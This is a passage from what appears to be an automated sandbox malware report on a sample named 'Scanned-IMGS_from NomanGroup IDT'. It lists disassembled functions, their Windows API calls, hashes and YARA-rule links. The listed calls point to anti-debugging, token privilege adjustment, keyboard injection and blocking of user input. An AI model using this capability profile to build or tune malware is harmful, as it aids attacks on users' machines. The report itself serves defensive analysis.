                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                • String ID:
                                                                                • API String ID: 3906539128-0
                                                                                • Opcode ID: 8aea1b046e30cee5e26f6d20d4671b0821b2626faad9a576ede1451ef2aeadfd
                                                                                • Instruction ID: a5227cf22b9ab560ca275ed9301575db8fca5386729932af519bd849305673a9
                                                                                • Opcode Fuzzy Hash: 8aea1b046e30cee5e26f6d20d4671b0821b2626faad9a576ede1451ef2aeadfd
                                                                                • Instruction Fuzzy Hash: 8D31D574901318ABCB21DF65DD887DDBBB8AF18310F5081EAE80CA7261E7749F818F48
                                                                                Function 004C51CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 004C51DA
                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 004C5238
                                                                                • SetErrorMode.KERNEL32(00000000), ref: 004C52A1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                                • String ID:
                                                                                • API String ID: 1682464887-0
                                                                                • Opcode ID: 149afddddc86ff98a4b8a978671259127ef661e5739a771a26386b69a0d9d1f7
                                                                                • Instruction ID: 1d6979d34ac79007ddbe416469fcd9b671341204eb29cf74df7257ca00e37f3e
                                                                                • Opcode Fuzzy Hash: 149afddddc86ff98a4b8a978671259127ef661e5739a771a26386b69a0d9d1f7
                                                                                • Instruction Fuzzy Hash: F7313C75A00618DFDB00DF55D8C4EADBBB4FF48318F048099E8459B392DB35E85ACB54
                                                                                Function 004B16C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0046FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00470668
                                                                                  • Part of subcall function 0046FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00470685
                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004B170D
                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004B173A
                                                                                • GetLastError.KERNEL32 ref: 004B174A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                • String ID:
                                                                                • API String ID: 577356006-0
                                                                                • Opcode ID: 4af3dab9f43aa53b755be6ae7ca027613ac7b4f187638194b1c810d3d0bec8f7
                                                                                • Instruction ID: ab28642a01b312d06c09fa8163aacd62ec948dfba69d581fadbfe912e97bfa70
                                                                                • Opcode Fuzzy Hash: 4af3dab9f43aa53b755be6ae7ca027613ac7b4f187638194b1c810d3d0bec8f7
                                                                                • Instruction Fuzzy Hash: F611CEB2400304AFD718AF54ECC6DABB7BDEB05714B20852FE49657291EB74BC428B68
                                                                                Function 004BD5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 004BD608
                                                                                • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 004BD645
                                                                                • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 004BD650
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CloseControlCreateDeviceFileHandle
                                                                                • String ID:
                                                                                • API String ID: 33631002-0
                                                                                • Opcode ID: f883b30cbe13319560d67f2b213b45d54c295eb979ce1f04e918bd1d3e92eef9
                                                                                • Instruction ID: 5fc6abce670f6f6e0bf66d8608e840f9003e9e1d6b0c021d2215df0c8d794ab6
                                                                                • Opcode Fuzzy Hash: f883b30cbe13319560d67f2b213b45d54c295eb979ce1f04e918bd1d3e92eef9
                                                                                • Instruction Fuzzy Hash: 7E113C75E05228BBDB108F959C85FEFBFBCEB45B50F108166F904E7290D6704A058BA5
                                                                                Function 004B1663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004B168C
                                                                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 004B16A1
                                                                                • FreeSid.ADVAPI32(?), ref: 004B16B1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                • String ID:
                                                                                • API String ID: 3429775523-0
                                                                                • Opcode ID: b83ef654a11ec12e08017b3a7cbd0e2962ce88de23a299dba9aa889977d34b1c
                                                                                • Instruction ID: bfcfd1735af130839b02aee69a98b3d76578395e7e22dc71cd6ed49a6d21bab7
                                                                                • Opcode Fuzzy Hash: b83ef654a11ec12e08017b3a7cbd0e2962ce88de23a299dba9aa889977d34b1c
                                                                                • Instruction Fuzzy Hash: 08F0F471950309FBDB00DFE49CC9EAEBBBCEB08604F504965E501E6191E774AA448A64
                                                                                Function 00474CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(004828E9,?,00474CBE,004828E9,005188B8,0000000C,00474E15,004828E9,00000002,00000000,?,004828E9), ref: 00474D09
                                                                                • TerminateProcess.KERNEL32(00000000,?,00474CBE,004828E9,005188B8,0000000C,00474E15,004828E9,00000002,00000000,?,004828E9), ref: 00474D10
                                                                                • ExitProcess.KERNEL32 ref: 00474D22
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CurrentExitTerminate
                                                                                • String ID:
                                                                                • API String ID: 1703294689-0
                                                                                • Opcode ID: a5b0d848b6d6f24bbbd69dc1890deb46f65ec6a1930addb5de1de63a03a870a7
                                                                                • Instruction ID: f9ac48711cc89c216f23b9ee7c5db876e3f388eef9f0a453737d4d70674d6f2f
                                                                                • Opcode Fuzzy Hash: a5b0d848b6d6f24bbbd69dc1890deb46f65ec6a1930addb5de1de63a03a870a7
                                                                                • Instruction Fuzzy Hash: A2E0BF31000188AFCF21AF55DD99A993B69EB81785B118429FC599A223DB39DD52CB48
                                                                                Function 004AD27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetUserNameW.ADVAPI32(?,?), ref: 004AD28C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: NameUser
                                                                                • String ID: X64
                                                                                • API String ID: 2645101109-893830106
                                                                                • Opcode ID: ef58e262db6b42523ca38eb136556779169e70ea65ae7b29e20d1391a69204a2
                                                                                • Instruction ID: 38a02683005b6fad86efcc5526d707101bced3cf29c8a6f2ec08110d2ad555b2
                                                                                • Opcode Fuzzy Hash: ef58e262db6b42523ca38eb136556779169e70ea65ae7b29e20d1391a69204a2
                                                                                • Instruction Fuzzy Hash: A9D0C9B5C0111DEACB90DB90DCC8DD9B37CBB14305F100192F506A2000D734954A8F15
                                                                                Function 0047CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                • Instruction ID: a91280f4d64d1a561b3fd4324d96c29428118030e2b793674ba4fbb1294686d2
                                                                                • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                • Instruction Fuzzy Hash: D3021B71E002199FDF24CFA9D9806EEBBF1EF48314F25816ED919E7384D734AA418B84
                                                                                Function 0045CAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Variable is not of type 'Object'.$p#R
                                                                                • API String ID: 0-3568732149
                                                                                • Opcode ID: ccb4b70716c2b483a656e067e54ac1bb6e18b4e86367ce85fa7b71dd04c927c0
                                                                                • Instruction ID: 95c4485017989d3eb09f139a3f60a188164a449e7f300c69e8db58cfa629a4fa
                                                                                • Opcode Fuzzy Hash: ccb4b70716c2b483a656e067e54ac1bb6e18b4e86367ce85fa7b71dd04c927c0
                                                                                • Instruction Fuzzy Hash: A2326971900318DFDF14DF90C881AEEB7B5BF15309F14405AE806AB392D779AE4ACB69
                                                                                Function 004C68EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 004C6918
                                                                                • FindClose.KERNEL32(00000000), ref: 004C6961
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Find$CloseFileFirst
                                                                                • String ID:
                                                                                • API String ID: 2295610775-0
                                                                                • Opcode ID: fd0582cf7fbd510cd5e9b5a4d802d6a9ef08ed045336f02e78f76c7166b79bdf
                                                                                • Instruction ID: 820f1265eb48a3ecb5780cbc9cd9fda24c5a2d2898d631ac7d00e1f4365d3a10
                                                                                • Opcode Fuzzy Hash: fd0582cf7fbd510cd5e9b5a4d802d6a9ef08ed045336f02e78f76c7166b79bdf
                                                                                • Instruction Fuzzy Hash: FB11AF756042009FC710CF29D8C5A16BBE1EF84329F05C6AEE8698F3A2C734EC05CB95
                                                                                Function 004C37B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,004D4891,?,?,00000035,?), ref: 004C37E4
                                                                                • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,004D4891,?,?,00000035,?), ref: 004C37F4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFormatLastMessage
                                                                                • String ID:
                                                                                • API String ID: 3479602957-0
                                                                                • Opcode ID: eb68cdc9d97fd19683d1a8d4a20762a43dc633fbd05ab113e40784ca0251376e
                                                                                • Instruction ID: 06e046305e33213ad93962533b0981f053a945e34968f74366b079f204a3d87f
                                                                                • Opcode Fuzzy Hash: eb68cdc9d97fd19683d1a8d4a20762a43dc633fbd05ab113e40784ca0251376e
                                                                                • Instruction Fuzzy Hash: 6CF05C716013182AD71017664C8CFEB7A5EDFC4761F00417AF505D2281C9604D04C6B4
                                                                                Function 004BB226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 004BB25D
                                                                                • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 004BB270
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: InputSendkeybd_event
                                                                                • String ID:
                                                                                • API String ID: 3536248340-0
                                                                                • Opcode ID: 5f4384b2f0702e9f7f508d80bad38c70c63e81e76ea3b47dd19e25d840e17d46
                                                                                • Instruction ID: 1b9d8d7b4c789dfcc664a0667326b5bd74e28069826071bcdf18391074ba380e
                                                                                • Opcode Fuzzy Hash: 5f4384b2f0702e9f7f508d80bad38c70c63e81e76ea3b47dd19e25d840e17d46
                                                                                • Instruction Fuzzy Hash: 2DF01D7180428EABDB059FA1C845BEE7BB4FF04305F00805AF965A9192C379C6129FA8
                                                                                Function 004B10BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004B11FC), ref: 004B10D4
                                                                                • CloseHandle.KERNEL32(?,?,004B11FC), ref: 004B10E9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                                                • String ID:
                                                                                • API String ID: 81990902-0
                                                                                • Opcode ID: 206f22f8bb2d492af35d0d0aa5418885500346100b89745fc2b6d2f73904d464
                                                                                • Instruction ID: 3cb0734448d63e247778ddff7dc0a4a81eff83d4746c5432c352243b5759396f
                                                                                • Opcode Fuzzy Hash: 206f22f8bb2d492af35d0d0aa5418885500346100b89745fc2b6d2f73904d464
                                                                                • Instruction Fuzzy Hash: 8DE04F72004600AEE7252B51FC45E737BA9EB04314B10882EF8A6844B1EB626C90DB58
                                                                                Function 0048676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00486766,?,?,00000008,?,?,0048FEFE,00000000), ref: 00486998
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionRaise
                                                                                • String ID:
                                                                                • API String ID: 3997070919-0
                                                                                • Opcode ID: 577bd86aef0dfe995eb20024f01df7fa844869b866d5c1e84d6cd48747c698df
                                                                                • Instruction ID: 2fde868bd7356e110fba211037cd49437d46ea3fd553c90ff60c4303780009bb
                                                                                • Opcode Fuzzy Hash: 577bd86aef0dfe995eb20024f01df7fa844869b866d5c1e84d6cd48747c698df
                                                                                • Instruction Fuzzy Hash: 0AB16D71510608DFD759DF28C48AB697BE0FF05364F268A59E899CF3A2C339D982CB44
                                                                                Function 0046B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID: 0-3916222277
                                                                                • Opcode ID: b7ad00bc63940771bbf034b3959412eafbd72252760e265c5da90d1b061be74e
                                                                                • Instruction ID: 997dc3dae4fb917fc90c876fc81eb281bca15e3f56e08eedb89e4d7a0ac7599c
                                                                                • Opcode Fuzzy Hash: b7ad00bc63940771bbf034b3959412eafbd72252760e265c5da90d1b061be74e
                                                                                • Instruction Fuzzy Hash: 5C125071A002299BDB14CF59C8806EEB7F5FF58710F14819BE849EB251EB389E81CF95
                                                                                Function 004CEAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • BlockInput.USER32(00000001), ref: 004CEABD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: BlockInput
                                                                                • String ID:
                                                                                • API String ID: 3456056419-0
                                                                                • Opcode ID: 494583637a2cc9a91af67f989f90b8d97a200e218ed3c8ce24f83bddcd45da30
                                                                                • Instruction ID: e80af0ffd58daf2c1d1c4bb0e57a0ed52b69bc5b212050af92a1385664af0a4c
                                                                                • Opcode Fuzzy Hash: 494583637a2cc9a91af67f989f90b8d97a200e218ed3c8ce24f83bddcd45da30
                                                                                • Instruction Fuzzy Hash: 3CE012352002049FC710DF6AD844E5AB7D9AF58764F00841BFC45C7351D775A8458B95
                                                                                Function 004709D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,004703EE), ref: 004709DA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID:
                                                                                • API String ID: 3192549508-0
                                                                                • Opcode ID: 14f2f45087164fef4636e445db1c7a784c245e6d949a85e1f479f93fa08c2feb
                                                                                • Instruction ID: f550c3b4988f1208fbb10dfbb77c4fe30e03dbf9f7e63b042924fcb0c6fbdd06
                                                                                • Opcode Fuzzy Hash: 14f2f45087164fef4636e445db1c7a784c245e6d949a85e1f479f93fa08c2feb
                                                                                • Instruction Fuzzy Hash:
                                                                                Function 0047781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
